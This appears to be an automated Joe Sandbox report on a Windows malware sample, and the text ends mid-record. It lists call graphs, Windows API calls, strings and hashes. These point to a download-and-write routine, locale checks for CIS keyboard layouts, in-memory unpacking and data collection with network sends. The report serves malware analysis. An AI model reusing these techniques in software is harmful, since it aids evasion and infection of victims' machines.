58904->58839 58905->58844 58931 417f80 26 API calls 4 library calls 58906->58931 58908 40596b 58908->58847 58910 404dc2 58909->58910 58914 404b92 58909->58914 58910->58851 58910->58852 58912 404ce5 58912->58910 58934 418ca0 26 API calls 4 library calls 58912->58934 58914->58912 58932 436da6 40 API calls __fassign 58914->58932 58933 418ca0 26 API calls 4 library calls 58914->58933 58919 4180de CatchIt 58916->58919 58921 418104 58916->58921 58917 4181ee 58937 419270 26 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 58917->58937 58919->58861 58920 4181f3 58938 402480 26 API calls 3 library calls 58920->58938 58921->58917 58923 418158 58921->58923 58924 41817d 58921->58924 58923->58920 58935 402480 26 API calls 5 library calls 58923->58935 58929 418169 std::_Rethrow_future_exception 58924->58929 58936 402480 26 API calls 5 library calls 58924->58936 58925 4181f8 58928 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58928->58917 58929->58928 58930 4181d0 shared_ptr 58929->58930 58930->58861 58931->58908 58932->58914 58933->58914 58934->58912 58935->58929 58936->58929 58938->58925 58939 4087b2 58940 4087b6 58939->58940 58941 4087b8 GetFileAttributesA 58939->58941 58940->58941 58942 4087c4 58941->58942 58943 41d762 58944 41d76e __FrameHandler3::FrameUnwindToState 58943->58944 58969 41d488 58944->58969 58946 41d775 58947 41d8ce 58946->58947 58957 41d79f ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 58946->58957 58992 41dba5 4 API calls 2 library calls 58947->58992 58949 41d8d5 58993 436629 58949->58993 58953 41d8e3 58954 41d7be 58955 41d83f 58977 4395bc 58955->58977 58957->58954 58957->58955 58991 436603 37 API calls 2 library calls 58957->58991 58959 41d845 58981 416d30 58959->58981 58970 41d491 58969->58970 58997 41dd91 IsProcessorFeaturePresent 58970->58997 58972 41d49d 58998 4347c4 10 API calls 2 library calls 58972->58998 58974 41d4a2 58975 41d4a6 58974->58975 58999 4347e3 7 API calls 2 library calls 58974->58999 58975->58946 58978 4395c5 58977->58978 58979 4395ca 58977->58979 59000 439320 49 API calls 58978->59000 58979->58959 58982 416d3b 58981->58982 59001 40ce40 58982->59001 58984 416d45 58985 40d6d0 52 API calls 58984->58985 58986 416d4a 58985->58986 58987 414fc0 77 API calls 58986->58987 58988 416d4f 58987->58988 58989 416d00 CreateThread 58988->58989 58990 416d20 Sleep 58989->58990 58990->58990 58991->58955 58992->58949 59006 4364c7 58993->59006 58996 4365ed 23 API calls __CreateFrameInfo 58996->58953 58997->58972 58998->58974 58999->58975 59000->58979 59002 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59001->59002 59003 40ce92 59002->59003 59004 405c10 51 API calls 59003->59004 59005 40ce9d 59004->59005 59007 4364e7 59006->59007 59008 4364d5 59006->59008 59018 43636e 59007->59018 59034 41dcc7 GetModuleHandleW 59008->59034 59011 4364da 59011->59007 59035 43656d GetModuleHandleExW 59011->59035 59013 41d8db 59013->58996 59016 43652a 59019 43637a __FrameHandler3::FrameUnwindToState 59018->59019 59041 438dc8 RtlEnterCriticalSection 59019->59041 59021 436384 59042 4363da 59021->59042 59023 436391 59046 4363af 59023->59046 59026 43652b 59051 43a302 GetPEB 59026->59051 59029 43655a 59032 43656d __CreateFrameInfo 3 API calls 59029->59032 59030 43653a GetPEB 59030->59029 59031 43654a GetCurrentProcess TerminateProcess 59030->59031 59031->59029 59033 436562 ExitProcess 59032->59033 59034->59011 59036 4365af 59035->59036 59037 43658c GetProcAddress 59035->59037 59038 4365b5 FreeLibrary 59036->59038 59039 4364e6 59036->59039 59040 4365a1 59037->59040 59038->59039 59039->59007 59040->59036 59041->59021 59043 4363e6 __FrameHandler3::FrameUnwindToState 59042->59043 59045 436447 __CreateFrameInfo 59043->59045 59049 4398a4 14 API calls __CreateFrameInfo 59043->59049 59045->59023 59050 438e10 RtlLeaveCriticalSection 59046->59050 59048 43639d 59048->59013 59048->59026 59049->59045 59050->59048 59052 436535 59051->59052 59053 43a31c 59051->59053 59052->59029 59052->59030 59055 43b2c7 5 API calls _unexpected 59053->59055 59055->59052 59056 218003c 59057 2180049 59056->59057 59071 2180e0f SetErrorMode SetErrorMode 59057->59071 59062 2180265 59063 21802ce VirtualProtect 59062->59063 59065 218030b 59063->59065 59064 2180439 VirtualFree 59069 21805f4 LoadLibraryA 59064->59069 59070 21804be 59064->59070 59065->59064 59066 21804e3 LoadLibraryA 59066->59070 59068 21808c7 59069->59068 59070->59066 59070->59069 59072 2180223 59071->59072 59073 2180d90 59072->59073 59074 2180dad 59073->59074 59075 2180dbb GetPEB 59074->59075 59076 2180238 VirtualAlloc 59074->59076 59075->59076 59076->59062 59077 52cbb6 59078 52cbc5 59077->59078 59081 52d356 59078->59081 59082 52d371 59081->59082 59083 52d37a CreateToolhelp32Snapshot 59082->59083 59084 52d396 Module32First 59082->59084 59083->59082 59083->59084 59085 52d3a5 59084->59085 59087 52cbce 59084->59087 59088 52d015 59085->59088 59089 52d040 59088->59089 59090 52d051 VirtualAlloc 59089->59090 59091 52d089 59089->59091 59090->59091 59091->59091 59092 40d159 GetModuleFileNameA 59093 40d191 59092->59093 59093->59093 59094 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59093->59094 59095 40d1ad 59094->59095 59096 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59095->59096 59097 40d1c0 59096->59097 59098 405c10 51 API calls 59097->59098 59099 40d1cb 59098->59099 59100 40d1f4 59099->59100 59221 418f40 26 API calls 4 library calls 59099->59221 59140 418220 59100->59140 59103 40d57c 59104 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59103->59104 59107 40d581 59104->59107 59105 40d27a shared_ptr 59105->59103 59106 40d441 shared_ptr 59105->59106 59109 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59106->59109 59114 40d4e5 shared_ptr 59106->59114 59108 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59107->59108 59117 40d586 59108->59117 59110 40d480 59109->59110 59112 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59110->59112 59111 40d54a shared_ptr 59113 41cff1 do_wait 5 API calls 59111->59113 59115 40d4ac 59112->59115 59116 40d56b 59113->59116 59114->59107 59114->59111 59118 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59115->59118 59119 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59117->59119 59121 40d4c7 59118->59121 59120 40d5dd 59119->59120 59122 405c10 51 API calls 59120->59122 59123 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59121->59123 59124 40d5e5 59122->59124 59125 40d4dc 59123->59125 59126 418220 26 API calls 59124->59126 59148 40b1a0 GetUserNameA 59125->59148 59128 40d5f5 59126->59128 59129 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59128->59129 59130 40d610 59129->59130 59131 405c10 51 API calls 59130->59131 59132 40d617 59131->59132 59133 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59132->59133 59134 40d62c 59133->59134 59135 405c10 51 API calls 59134->59135 59136 40d633 shared_ptr 59135->59136 59137 40d6aa shared_ptr 59136->59137 59138 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59136->59138 59139 40d6c9 59138->59139 59141 418292 59140->59141 59142 418248 59140->59142 59145 4182a1 CatchIt 59141->59145 59223 418f40 26 API calls 4 library calls 59141->59223 59142->59141 59143 418251 59142->59143 59222 419280 26 API calls 2 library calls 59143->59222 59145->59105 59146 41825a 59146->59105 59149 40b217 59148->59149 59149->59149 59150 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59149->59150 59151 40b233 59150->59151 59152 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59151->59152 59153 40b2dd 59152->59153 59154 40b3ad CoInitialize 59153->59154 59155 40b3d1 CoCreateInstance 59154->59155 59166 40b3fa shared_ptr 59154->59166 59156 40b780 59155->59156 59157 40b3f4 CoUninitialize 59155->59157 59158 40b7a6 59156->59158 59186 40b84b ListArray 59156->59186 59157->59166 59162 40b7c2 CoUninitialize 59158->59162 59163 40b7d9 CoUninitialize 59158->59163 59158->59166 59159 40b9e2 59160 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59159->59160 59161 40b9e7 59160->59161 59164 40ba46 CoInitialize 59161->59164 59162->59166 59165 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59163->59165 59167 40ba61 CoCreateInstance 59164->59167 59173 40ba87 shared_ptr 59164->59173 59168 40b7f3 59165->59168 59166->59159 59171 40b77b shared_ptr 59166->59171 59169 40ba81 CoUninitialize 59167->59169 59183 40bb07 59167->59183 59170 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59168->59170 59169->59173 59172 40b80b 59170->59172 59175 41cff1 do_wait 5 API calls 59171->59175 59174 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59172->59174 59176 40bb05 shared_ptr 59173->59176 59178 40bb8a 59173->59178 59179 40b823 59174->59179 59180 40b9de 59175->59180 59177 41cff1 do_wait 5 API calls 59176->59177 59181 40bb86 59177->59181 59182 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59178->59182 59184 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59179->59184 59180->59114 59181->59114 59185 40bb8f 59182->59185 59183->59173 59189 40bb40 CoUninitialize 59183->59189 59190 40bb54 CoUninitialize 59183->59190 59187 40b835 59184->59187 59195 40bbd6 ListArray Concurrency::details::SchedulerProxy::AddCore 59185->59195 59197 40bd80 shared_ptr 59185->59197 59191 40b8cc GetLocalTime 59186->59191 59188 40b1a0 45 API calls 59187->59188 59188->59166 59192 40bb4f 59189->59192 59190->59173 59205 40b96b CoUninitialize 59191->59205 59192->59173 59193 40bdea shared_ptr 59194 41cff1 do_wait 5 API calls 59193->59194 59198 40be0e 59194->59198 59199 40bbf6 CreateFileA InternetOpenA InternetOpenUrlA InternetReadFile 59195->59199 59196 40be1c 59200 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59196->59200 59197->59193 59197->59196 59198->59114 59201 40bc97 CloseHandle InternetCloseHandle InternetCloseHandle 59199->59201 59202 40bc68 59199->59202 59203 40be21 59200->59203 59204 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59201->59204 59202->59201 59206 40bc77 WriteFile InternetReadFile 59202->59206 59208 40bcba 59204->59208 59205->59166 59206->59201 59206->59202 59209 40bd05 shared_ptr 59208->59209 59211 40be12 59208->59211 59210 40bd6b shared_ptr 59209->59210 59224 436a44 42 API calls 2 library calls 59209->59224 59210->59197 59213 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59211->59213 59215 40be17 59213->59215 59214 40bd24 59225 406d70 26 API calls 2 library calls 59214->59225 59217 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59215->59217 59217->59196 59218 40bd32 RemoveDirectoryA 59218->59210 59220 40bd49 59218->59220 59220->59210 59220->59215 59221->59100 59222->59146 59223->59145 59224->59214 59225->59218 59226 40d79c 59227 40d7a7 59226->59227 59228 40d7cc shared_ptr 59226->59228 59227->59228 59229 40db6a 59227->59229 59232 40d905 GetModuleFileNameA 59228->59232 59230 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59229->59230 59231 40db6f 59230->59231 59233 4367b7 67 API calls 59231->59233 59234 40d940 59232->59234 59235 40db75 59233->59235 59234->59234 59237 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59234->59237 59251 4179c0 59235->59251 59242 40d95c 59237->59242 59239 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59240 40dba5 59239->59240 59241 4179c0 26 API calls 59240->59241 59245 40dbb8 59241->59245 59243 40db42 shared_ptr 59242->59243 59246 40dbcb 59242->59246 59244 41cff1 do_wait 5 API calls 59243->59244 59247 40db63 59244->59247 59245->59246 59248 436629 23 API calls 59245->59248 59249 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59246->59249 59248->59246 59250 40dbd0 59249->59250 59252 4179e0 59251->59252 59252->59252 59253 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59252->59253 59254 40db8a 59253->59254 59254->59239
                    APIs
                    • SetCurrentDirectoryA.KERNEL32(00000000,900B88F7,00000000), ref: 0040AA0C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentDirectory
                    • String ID: @3P$VUUU$h-F
                    • API String ID: 1611563598-1891901568
                    • Opcode ID: de469c50572d96fa831817a3e8334893a081dba1cd581f061f222784eee2821c
                    • Instruction ID: 9340701fd5f7403cf7ba50309dfb341378973f904e2d2e41fb1fe6cd50d97ea3
                    • Opcode Fuzzy Hash: de469c50572d96fa831817a3e8334893a081dba1cd581f061f222784eee2821c
                    • Instruction Fuzzy Hash: 4AC2C271A002089FDB18DF28CD89BDEB775EF45304F5081AEE409A72D1DB799A84CF99
                    APIs
                      • Part of subcall function 00408B30: GetTempPathA.KERNEL32(00000104,?,900B88F7,?,00000000), ref: 00408B77
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00409A73
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFilePathTemp
                    • String ID: T2F
                    • API String ID: 3199926297-3862687658
                    • Opcode ID: df180cf6ccc42a80ff8a097845aaf710529a4aa3076e3f0e8fe5be7919888161
                    • Instruction ID: f8d341d7b221fbf4855467c9c2f70b5ca956d984b14cba194293e40f11c0d304
                    • Opcode Fuzzy Hash: df180cf6ccc42a80ff8a097845aaf710529a4aa3076e3f0e8fe5be7919888161
                    • Instruction Fuzzy Hash: D942E770D00244DBEF14EBB8C6497DE7BB2AF06314F24466AD411773C2D77D5A848BAA

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1028 407d30-407db2 call 4340f0 GetVersionExW 1031 408356-408373 call 41cff1 1028->1031 1032 407db8-407de0 call 417a00 call 405c10 1028->1032 1039 407de2 1032->1039 1040 407de4-407e06 call 417a00 call 405c10 1032->1040 1039->1040 1045 407e08 1040->1045 1046 407e0a-407e23 GetModuleHandleA GetProcAddress 1040->1046 1045->1046 1047 407e54-407e7f 1046->1047 1048 407e25-407e34 1046->1048 1051 407eb0-407ed1 1047->1051 1052 407e81-407e90 1047->1052 1049 407e36-407e44 1048->1049 1050 407e4a-407e51 call 41d663 1048->1050 1049->1050 1057 408374 call 436c6a 1049->1057 1050->1047 1055 407ed3-407ed5 GetNativeSystemInfo 1051->1055 1056 407ed7 GetSystemInfo 1051->1056 1053 407e92-407ea0 1052->1053 1054 407ea6-407ead call 41d663 1052->1054 1053->1054 1053->1057 1054->1051 1060 407edd-407ee6 1055->1060 1056->1060 1066 408379-40837f call 436c6a 1057->1066 1064 407f04-407f07 1060->1064 1065 407ee8-407eef 1060->1065 1069 4082f7-4082fa 1064->1069 1070 407f0d-407f16 1064->1070 1067 408351 1065->1067 1068 407ef5-407eff 1065->1068 1067->1031 1072 40834c 1068->1072 1069->1067 1075 4082fc-408305 1069->1075 1073 407f18-407f24 1070->1073 1074 407f29-407f2c 1070->1074 1072->1067 1073->1072 1077 407f32-407f39 1074->1077 1078 4082d4-4082d6 1074->1078 1079 408307-40830b 1075->1079 1080 40832c-40832f 1075->1080 1085 408019-4082bd call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 1077->1085 1086 407f3f-407f9b call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 1077->1086 1083 4082e4-4082e7 1078->1083 1084 4082d8-4082e2 1078->1084 1087 408320-40832a 1079->1087 1088 40830d-408312 1079->1088 1081 408331-40833b 1080->1081 1082 40833d-408349 1080->1082 1081->1067 1082->1072 1083->1067 1092 4082e9-4082f5 1083->1092 1084->1072 1122 4082c3-4082cc 1085->1122 1109 407fa0-407fa7 1086->1109 1087->1067 1088->1087 1090 408314-40831e 1088->1090 1090->1067 1092->1072 1112 407fa9 1109->1112 1113 407fab-407fcb call 438bbe 1109->1113 1112->1113 1119 408002-408004 1113->1119 1120 407fcd-407fdc 1113->1120 1119->1122 1123 40800a-408014 1119->1123 1124 407ff2-407fff call 41d663 1120->1124 1125 407fde-407fec 1120->1125 1122->1069 1128 4082ce 1122->1128 1123->1122 1124->1119 1125->1066 1125->1124 1128->1078
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,900B88F7), ref: 00407DAA
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407E0B
                    • GetProcAddress.KERNEL32(00000000), ref: 00407E12
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED3
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                    • String ID:
                    • API String ID: 374719553-0
                    • Opcode ID: 43ca09576ce7c24a49e7d91595eab8dde10c4ec89019c759e4370e9cc0113e14
                    • Instruction ID: d767b28cf4d1304312a0b4bfeaf627bf696c138522586543ff54ff165ce39ac5
                    • Opcode Fuzzy Hash: 43ca09576ce7c24a49e7d91595eab8dde10c4ec89019c759e4370e9cc0113e14
                    • Instruction Fuzzy Hash: B4E10A70E00654A7DB14BB28CD0B39E7671AB82714F5442AEE815773C2DB7D4E858BCB

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1338 43652b-436538 call 43a302 1341 43655a-436566 call 43656d ExitProcess 1338->1341 1342 43653a-436548 GetPEB 1338->1342 1342->1341 1343 43654a-436554 GetCurrentProcess TerminateProcess 1342->1343 1343->1341
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0043652A,?,?,?,?,?,00437661), ref: 0043654D
                    • TerminateProcess.KERNEL32(00000000,?,0043652A,?,?,?,?,?,00437661), ref: 00436554
                    • ExitProcess.KERNEL32 ref: 00436566
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
                    • Instruction ID: 8ba592f2701f3bed1e9346099357e5860ce392234eb0f7d34856f934df6fdfbc
                    • Opcode Fuzzy Hash: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
                    • Instruction Fuzzy Hash: D7E0EC35000649BFCF116F59ED0D9493B69FB48746F059435FA0A86232CB7ADD92CF89

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1482 52d356-52d36f 1483 52d371-52d373 1482->1483 1484 52d375 1483->1484 1485 52d37a-52d386 CreateToolhelp32Snapshot 1483->1485 1484->1485 1486 52d396-52d3a3 Module32First 1485->1486 1487 52d388-52d38e 1485->1487 1488 52d3a5-52d3a6 call 52d015 1486->1488 1489 52d3ac-52d3b4 1486->1489 1487->1486 1493 52d390-52d394 1487->1493 1494 52d3ab 1488->1494 1493->1483 1493->1486 1494->1489
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0052D37E
                    • Module32First.KERNEL32(00000000,00000224), ref: 0052D39E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353337149.000000000052C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0052C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_52c000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: eebf690ddcac4b0860102b19f69e8b00712ad766186d29259a153c4661178e5d
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: EEF068351007216FD7207BB5E88DB6E7AF8BF5A725F100528E546910C0D770E8454672
                    APIs
                    • GetUserNameA.ADVAPI32(?,?), ref: 0040B1ED
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 86a4361ad296d9a7c7be782d3087d9ac5decf79edf26736f0f3b57da14de4269
                    • Instruction ID: 04b2a403b83c723c030908a0a5e120f00658eb7981edf9051d4d18a2c30bc2f5
                    • Opcode Fuzzy Hash: 86a4361ad296d9a7c7be782d3087d9ac5decf79edf26736f0f3b57da14de4269
                    • Instruction Fuzzy Hash: 0B211AB191015CABDB2ACF54CD65BEAB7B8EB19704F0042DDA50A63281D7745B88CFA0

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: cc3441c8cc69dd047227bf6c51d55cfe6d1894cac9eb61caf101bb13ff3a2e9e
                    • Instruction ID: 448877648adff1088d2a9d486534a169f5918e2e35df4f0b5b8ee8aeb0257759
                    • Opcode Fuzzy Hash: cc3441c8cc69dd047227bf6c51d55cfe6d1894cac9eb61caf101bb13ff3a2e9e
                    • Instruction Fuzzy Hash: 5DF1C170900248ABEB24DF54CD85BDEBBB9EB45304F5041AAF509A72C1DB789A84CF99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 828 441abc-441aec call 44180a 831 441b07-441b13 call 43bf3a 828->831 832 441aee-441af9 call 4375e3 828->832 838 441b15-441b2a call 4375e3 call 4375f6 831->838 839 441b2c-441b75 call 441775 831->839 837 441afb-441b02 call 4375f6 832->837 846 441de1-441de5 837->846 838->837 848 441b77-441b80 839->848 849 441be2-441beb GetFileType 839->849 853 441bb7-441bdd GetLastError call 4375c0 848->853 854 441b82-441b86 848->854 850 441c34-441c37 849->850 851 441bed-441c1e GetLastError call 4375c0 CloseHandle 849->851 858 441c40-441c46 850->858 859 441c39-441c3e 850->859 851->837 867 441c24-441c2f call 4375f6 851->867 853->837 854->853 855 441b88-441bb5 call 441775 854->855 855->849 855->853 860 441c48 858->860 861 441c4a-441c98 call 43be85 858->861 859->861 860->861 870 441cb7-441cdf call 441522 861->870 871 441c9a-441ca6 call 441984 861->871 867->837 878 441ce4-441d25 870->878 879 441ce1-441ce2 870->879 871->870 877 441ca8 871->877 882 441caa-441cb2 call 43af48 877->882 880 441d46-441d54 878->880 881 441d27-441d2b 878->881 879->882 884 441ddf 880->884 885 441d5a-441d5e 880->885 881->880 883 441d2d-441d41 881->883 882->846 883->880 884->846 885->884 887 441d60-441d93 CloseHandle call 441775 885->887 891 441d95-441dc1 GetLastError call 4375c0 call 43c04d 887->891 892 441dc7-441ddb 887->892 891->892 892->884
                    APIs
                      • Part of subcall function 00441775: CreateFileW.KERNELBASE(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                    • GetLastError.KERNEL32 ref: 00441BD0
                    • __dosmaperr.LIBCMT ref: 00441BD7
                    • GetFileType.KERNELBASE(00000000), ref: 00441BE3
                    • GetLastError.KERNEL32 ref: 00441BED
                    • __dosmaperr.LIBCMT ref: 00441BF6
                    • CloseHandle.KERNEL32(00000000), ref: 00441C16
                    • CloseHandle.KERNEL32(0043AC92), ref: 00441D63
                    • GetLastError.KERNEL32 ref: 00441D95
                    • __dosmaperr.LIBCMT ref: 00441D9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 7e17bc01896d330f6a953f9dbc221eb630c8e931c060a5af7141eb9f4136a765
                    • Instruction ID: 908140145710097c147751781d0df85f7731599b948b663735adbecd062618f5
                    • Opcode Fuzzy Hash: 7e17bc01896d330f6a953f9dbc221eb630c8e931c060a5af7141eb9f4136a765
                    • Instruction Fuzzy Hash: 20A13972A041489FDF19DF68DC91BAE3BB1EB0A324F14015EE811EB3E1D7389942CB59

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 897 40d79c-40d7a5 898 40d7d6-40d93d GetModuleFileNameA 897->898 899 40d7a7-40d7b6 897->899 912 40d940-40d945 898->912 900 40d7b8-40d7c6 899->900 901 40d7cc-40d7d3 call 41d663 899->901 900->901 903 40db6a-40dbc4 call 436c6a call 4367b7 call 4179c0 call 417a00 call 4179c0 call 4072b0 900->903 901->898 937 40dbcb-40dbd0 call 436c6a 903->937 940 40dbc6 call 436629 903->940 912->912 914 40d947-40db1b call 4180c0 call 419470 912->914 929 40db4c-40db69 call 41cff1 914->929 930 40db1d-40db2c 914->930 932 40db42-40db49 call 41d663 930->932 933 40db2e-40db3c 930->933 932->929 933->932 933->937 940->937
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D913
                    • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0040DA2F
                    • send.WS2_32(?,?,00000004,00000000), ref: 0040DC2E
                    • send.WS2_32(?,?,00000008,00000000), ref: 0040DC6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: send$CreateDirectoryFileModuleName
                    • String ID:
                    • API String ID: 2319890793-0
                    • Opcode ID: 80b1132b2e69c19d12a8b7e2791303c1400add0845b9d63165f9072d547c2120
